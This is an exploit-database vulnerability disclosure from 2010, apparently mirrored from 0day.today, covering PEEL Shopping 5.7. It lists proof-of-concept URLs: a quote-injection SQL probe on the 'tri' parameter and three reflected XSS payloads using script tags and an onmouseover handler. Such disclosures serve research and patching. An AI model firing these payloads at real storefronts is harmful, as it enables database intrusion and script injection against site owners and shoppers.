id: 13769
date: 08/21/2010
title: PEEL Shopping 5.7 SQLi / Xss Vulnerabilities
author: Sweet
cves: 

============================================
PEEL Shopping 5.7 SQLi / Xss Vulnerabilities
============================================

# Author: Sweet
#Email : charif38@hotmail.fr
# Software Link: http://www.peel.fr
#Download:http://www.peel.fr/lire/peel-shopping-8.html
# Version: 5.7
# Tested on: WinXp sp3
#Description : Pell Shoping is a free software to manage shoping

SQLi
http://www.example.com/Peelpath/achat/index.php?catid=1&tri=1'

XSS

xss in uri :
http://ww.example.com/Peelpath/achat/index.php/>"><ScRiPt>alert("sweet")</ScRiPt>

xss in path:
http://www.example.com/Peelpath/?>"'><ScRiPt>alert("sweet")</ScRiPt>

xss
http://www.example.com/Peelpath/achat/index.php?catid=1"+onmouseover=alert("sweet")+


Saha Ftourkoum :))



#  0day.today [2023-03-23]  #